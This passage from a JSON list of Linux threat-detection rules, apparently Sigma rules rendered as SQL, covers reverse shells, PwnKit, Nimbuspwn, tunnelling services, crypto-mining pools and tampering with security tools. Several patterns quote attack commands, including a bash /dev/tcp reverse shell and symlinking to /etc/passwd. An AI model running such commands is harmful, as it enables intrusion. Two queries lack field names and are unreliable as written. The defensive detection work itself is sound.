            "SELECT * FROM logs WHERE (USER LIKE '#-%' ESCAPE '\\' OR USER LIKE '#%4294967295' ESCAPE '\\')"
        ],
        "filename": "lnx_sudo_cve_2019_14287_user.yml"
    },
    {
        "title": "Disabling Security Tools - Builtin",
        "id": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36",
        "description": "Detects disabling security tools",
        "author": "Ömer Günal, Alejandro Ortuno, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.004"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (logs MATCH ('\"stopping iptables\" OR \"stopping ip6tables\" OR \"stopping firewalld\" OR \"stopping cbdaemon\" OR \"stopping falcon-sensor\"'))"
        ],
        "filename": "lnx_syslog_security_tools_disabling_syslog.yml"
    },
    {
        "title": "Suspicious Named Error",
        "id": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365",
        "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.initial-access",
            "attack.t1190"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (logs MATCH ('\" dropping source port zero packet from \" OR \" denied AXFR from \" OR \" exiting (due to fatal error)\"'))"
        ],
        "filename": "lnx_syslog_susp_named.yml"
    },
    {
        "title": "Modifying Crontab",
        "id": "af202fd3-7bff-4212-a25a-fb34606cfcbe",
        "description": "Detects suspicious modification of crontab file.",
        "author": "Pawel Mazur",
        "tags": [
            "attack.persistence",
            "attack.t1053.003"
        ],
        "falsepositives": [
            "Legitimate modification of crontab"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE logs MATCH ('\"REPLACE\"')"
        ],
        "filename": "lnx_cron_crontab_file_modification.yml"
    },
    {
        "title": "JexBoss Command Sequence",
        "id": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae",
        "description": "Detects suspicious command sequence that JexBoss",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.execution",
            "attack.t1059.004"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (logs MATCH ('\"bash -c /bin/bash\" AND \"&/dev/tcp/\"'))"
        ],
        "filename": "lnx_susp_jexboss.yml"
    },
    {
        "title": "Suspicious Log Entries",
        "id": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1",
        "description": "Detects suspicious log entries in Linux log files",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.impact"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (logs MATCH ('\"entered promiscuous mode\" OR \"Deactivating service\" OR \"Oversized packet received from\" OR \"imuxsock begins to drop messages\"'))"
        ],
        "filename": "lnx_shell_susp_log_entries.yml"
    },
    {
        "title": "Guacamole Two Users Sharing Session Anomaly",
        "id": "1edd77db-0669-4fef-9598-165bda82826d",
        "description": "Detects suspicious session with two users present",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.credential-access",
            "attack.t1212"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE logs MATCH ('\"(2 users now present)\"')"
        ],
        "filename": "lnx_guacamole_susp_guacamole.yml"
    },
    {
        "title": "Code Injection by ld.so Preload",
        "id": "7e3c4651-c347-40c4-b1d4-d48590fdf684",
        "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.",
        "author": "Christian Burkard (Nextron Systems)",
        "tags": [
            "attack.persistence",
            "attack.privilege-escalation",
            "attack.t1574.006"
        ],
        "falsepositives": [
            "Rare temporary workaround for library misconfiguration"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE logs MATCH ('\"/etc/ld.so.preload\"')"
        ],
        "filename": "lnx_ldso_preload_injection.yml"
    },
    {
        "title": "Nimbuspwn Exploitation",
        "id": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8",
        "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)",
        "author": "Bhabesh Raj",
        "tags": [
            "attack.privilege-escalation",
            "attack.t1068"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ( = 'networkd-dispatcher' AND  = 'Error handling notification for interface' AND  = '../../')"
        ],
        "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml"
    },
    {
        "title": "PwnKit Local Privilege Escalation",
        "id": "0506a799-698b-43b4-85a1-ac4c84c720e9",
        "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs",
        "author": "Sreeman",
        "tags": [
            "attack.privilege-escalation",
            "attack.t1548.001"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ( = 'pkexec' AND  = 'The value for environment variable XAUTHORITY contains suspicious content' AND  = '[USER=root] [TTY=/dev/pts/0]')"
        ],
        "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml"
    },
    {
        "title": "Symlink Etc Passwd",
        "id": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523",
        "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.t1204.001",
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (logs MATCH ('\"ln -s -f /etc/passwd\" OR \"ln -s /etc/passwd\"'))"
        ],
        "filename": "lnx_symlink_etc_passwd.yml"
    },
    {
        "title": "Linux Reverse Shell Indicator",
        "id": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871",
        "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.execution",
            "attack.t1059.004"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "critical",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/bin/bash' ESCAPE '\\' AND NOT (DestinationIp IN ('127.0.0.1', '0.0.0.0')))"
        ],
        "filename": "net_connection_lnx_back_connect_shell_dev.yml"
    },
    {
        "title": "Communication To Ngrok Tunneling Service - Linux",
        "id": "19bf6fdb-7721-4f3d-867f-53467f6a5db6",
        "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.exfiltration",
            "attack.command-and-control",
            "attack.t1567",
            "attack.t1568.002",
            "attack.t1572",
            "attack.t1090",
            "attack.t1102",
            "attack.s0508"
        ],
        "falsepositives": [
            "Legitimate use of ngrok"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')"
        ],
        "filename": "net_connection_lnx_ngrok_tunnel.yml"
    },
    {
        "title": "Linux Crypto Mining Pool Connections",
        "id": "a46c93b7-55ed-4d27-a41b-c259456c4746",
        "description": "Detects process connections to a Monero crypto mining pool",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.impact",
            "attack.t1496"
        ],
        "falsepositives": [
            "Legitimate use of crypto miners"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')"
        ],
        "filename": "net_connection_lnx_crypto_mining_indicators.yml"
    },
    {
        "title": "Communication To LocaltoNet Tunneling Service Initiated - Linux",
        "id": "c4568f5d-131f-4e78-83d4-45b2da0ec4f1",
        "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\n",
        "author": "Andreas Braathen (mnemonic.io)",
        "tags": [
            "attack.command-and-control",
            "attack.t1572",
            "attack.t1090",
            "attack.t1102"
        ],
        "falsepositives": [
            "Legitimate use of the LocaltoNet service."
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((DestinationHostname LIKE '%.localto.net' ESCAPE '\\' OR DestinationHostname LIKE '%.localtonet.com' ESCAPE '\\') AND Initiated = 'true')"
        ],
        "filename": "net_connection_lnx_domain_localtonet_tunnel.yml"
    }
]